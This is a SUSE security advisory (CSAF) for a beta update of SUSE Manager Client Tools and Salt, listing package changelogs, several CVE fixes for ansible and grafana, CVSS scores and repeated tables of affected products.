Vulnerability from csaf_suse - Published: 2024-04-24 09:10 - Updated: 2024-04-24 09:10Summary
Security Beta update for SUSE Manager Client Tools and Salt
Severity
Moderate
Notes
Title of the patch: Security Beta update for SUSE Manager Client Tools and Salt
Description of the patch: This update fixes the following issues:
POS_Image-Graphical7:
- Update to version 0.1.1710765237.46af599
* Move image services to dracut-saltboot package
* Use salt bundle
- Update to version 0.1.1645440615.7f1328c
* Remove deprecated kiwi functions
POS_Image-JeOS7:
- Update to version 0.1.1710765237.46af599
* Move image services to dracut-saltboot package
* Use salt bundle
- Update to version 0.1.1645440615.7f1328c
* Remove deprecated kiwi functions
ansible:
- CVE-2023-5764: Address issues where internal templating can cause unsafe
variables to lose their unsafe designation (bsc#1216854)
* breaking_changes:
assert - Nested templating may result in an inability for the conditional
to be evaluated. See the porting guide for more information.
- CVE-2024-0690: Address issue where ANSIBLE_NO_LOG was ignored (bsc#1219002)
- CVE-2020-14365: Do a GPG validation if the disable_gpg_check option is not set. (bsc#1175993)
- Don't Require python-coverage, it is needed only for testing (bsc#1177948)
- CVE-2018-10874: Inventory variables are loaded from current working directory when running ad-hoc command that can
lead to code execution (included upstream in 2.6.1) (bsc#1099805)
dracut-saltboot:
- Update to version 0.1.1710765237.46af599
* Load only first available leaseinfo (bsc#1221092)
- Update to version 0.1.1681904360.84ef141
grafana:
- Require Go 1.20
- Update to version 9.5.16:
* [SECURITY] CVE-2023-6152: Add email verification when updating
user email (bsc#1219912)
* [BUGFIX] Annotations: Split cleanup into separate queries and
deletes to avoid deadlocks on MySQL
- Update to version 9.5.15:
* [FEATURE] Alerting: Attempt to retry retryable errors
- Update to version 9.5.14:
* [BUGFIX] Alerting: Fix state manager to not keep
datasource_uid and ref_id labels in state after Error
* [BUGFIX] Transformations: Config overrides being lost when
config from query transform is applied
* [BUGFIX] LDAP: Fix enable users on successfull login
- Update to version 9.5.13:
* [BUGFIX] BrowseDashboards: Only remember the most recent
expanded folder
* [BUGFIX] Licensing: Pass func to update env variables when
starting plugin
- Update to version 9.5.12:
* [FEATURE] Azure: Add support for Workload Identity
authentication
- Update to version 9.5.9:
* [FEATURE] SSE: Fix DSNode to not panic when response has empty
response
* [FEATURE] Prometheus: Handle the response with different field
key order
* [BUGFIX] LDAP: Fix user disabling
golang-github-prometheus-node_exporter:
- Add `device_error` label for filesystem metrics.
- Update rtnetlink library to fix errors during ARP metrics collection.
- Update to 1.7.0 (jsc#PED-7893, jsc#PED-7928):
* [FEATURE] Add ZFS freebsd per dataset stats #2753
* [FEATURE] Add cpu vulnerabilities reporting from sysfs #2721
* [ENHANCEMENT] Parallelize stat calls in Linux filesystem
collector #1772
* [ENHANCEMENT] Add missing linkspeeds to ethtool collector #2711
* [ENHANCEMENT] Add CPU MHz as the value for node_cpu_info metric
#2778
* [ENHANCEMENT] Improve qdisc collector performance #2779
* [ENHANCEMENT] Add include and exclude filter for hwmon
collector #2699
* [ENHANCEMENT] Optionally fetch ARP stats via rtnetlink instead
of procfs #2777
* [BUFFIX] Fix ZFS arcstats on FreeBSD 14.0+ 2754
* [BUGFIX] Fallback to 32-bit stats in netdev #2757
* [BUGFIX] Close btrfs.FS handle after use #2780
* [BUGFIX] Move RO status before error return #2807
* [BUFFIX] Fix promhttp_metric_handler_errors_total being always
active #2808
* [BUGFIX] Fix nfsd v4 index miss #2824
- Update to 1.6.1:
(no source code changes in this release)
- BuildRequire go1.20
- Update to 1.6.0:
* [CHANGE] Fix cpustat when some cpus are offline #2318
* [CHANGE] Remove metrics of offline CPUs in CPU collector #2605
* [CHANGE] Deprecate ntp collector #2603
* [CHANGE] Remove bcache `cache_readaheads_totals` metrics #2583
* [CHANGE] Deprecate supervisord collector #2685
* [FEATURE] Enable uname collector on NetBSD #2559
* [FEATURE] NetBSD support for the meminfo collector #2570
* [FEATURE] NetBSD support for CPU collector #2626
* [FEATURE] Add FreeBSD collector for netisr subsystem #2668
* [FEATURE] Add softirqs collector #2669
* [ENHANCEMENT] Add suspended as a `node_zfs_zpool_state` #2449
* [ENHANCEMENT] Add administrative state of Linux network
interfaces #2515
* [ENHANCEMENT] Log current value of GOMAXPROCS #2537
* [ENHANCEMENT] Add profiler options for perf collector #2542
* [ENHANCEMENT] Allow root path as metrics path #2590
* [ENHANCEMENT] Add cpu frequency governor metrics #2569
* [ENHANCEMENT] Add new landing page #2622
* [ENHANCEMENT] Reduce privileges needed for btrfs device stats #2634
* [ENHANCEMENT] Add ZFS `memory_available_bytes` #2687
* [ENHANCEMENT] Use `SCSI_IDENT_SERIAL` as serial in diskstats #2612
* [ENHANCEMENT] Read missing from netlink netclass attributes from sysfs #2669
* [BUGFIX] perf: fixes for automatically detecting the correct
tracefs mountpoints #2553
* [BUGFIX] Fix `thermal_zone` collector noise @2554
* [BUGFIX] Fix a problem fetching the user wire count on FreeBSD
2584
* [BUGFIX] interrupts: Fix fields on linux aarch64 #2631
* [BUGFIX] Remove metrics of offline CPUs in CPU collector #2605
* [BUGFIX] Fix OpenBSD filesystem collector string parsing #2637
* [BUGFIX] Fix bad reporting of `node_cpu_seconds_total` in
OpenBSD #2663
- Change go_modules archive in _service to use obscpio file
spacecmd:
- Version 5.0.5-0
* Update translation strings
spacewalk-client-tools:
- Version 5.0.4-0
* Remove rhn-profile-sync rhn_register spacewalk-channel and
spacewalk-update-status
supportutils-plugin-susemanager-client:
- Version 5.0.3-0
* Remove rhnsd from client actions and server backend
uyuni-tools:
- Version 0.1.7-0
* Fix wrong Cobbler spacewalk_authentication_endpoint property after upgrade or migration
* Fix migration script using missing awk in migration image
- Version 0.1.6-0
* Pull image from authenticated registry
* Port 80 should be published to the port 80 of the containers.
8080 is squid
* Autogenerate the database password
* Add mgrctl term command
* Fix --version flag
* Deny uyuni to suma upgrade and viceversa
* Refactor upgrade to clarify script end adding post upgrade
script (bsc#1219887)
* Add mgradm install podman arguments to define big volumes storage
* k8s migration use same functions as upgrade
* Allow to use images from RPM if present
* Schedule a system list refresh after migrate if not runned before
* Ignore error on optional flag
* Fix migration of multiple autoinstallable distributions
* Obsolete uyuni-proxy-systemd-service package by mgrpxy
* Add GitHub workflow for checking changelog
* Allow installation using --image image:tag
* Add command to register Peripheral server to Hub
* Add Node exporter (9100) and Taskomatic (9800) ports to the list
of open TCP ports
* Fix minimal administrator password length
* Do not assume the current host is a cluster node when getting
kubelet version
* Add mgrpxy start, stop and restart commands
* Remove shm size constraints on the server
* Add mgrpxy and mgradm status commands
* Use uninstall commands dry run by default to avoid unintended
removals
* Make first user mandatory at install time
* Add inspect and upgrade command
* Improve error handling when exec.Command is used
* Start/Stop/Restart command with kubernetes
- Version 0.1.5-0
* Install aardvark-dns if netavark is installed (bsc#1220371)
Patchnames: SUSE-2024-1427,SUSE-SLE-Manager-Tools-15-BETA-2024-1427,SUSE-SLE-Manager-Tools-Beta-For-Micro-5-2024-1427
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
4.9 (Medium)
Affected products
Recommended
31 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
Threats
Impact
low
8.1 (High)
Affected products
Recommended
31 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
8.5 (High)
Affected products
Recommended
31 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
31 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
6.3 (Medium)
Affected products
Recommended
31 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
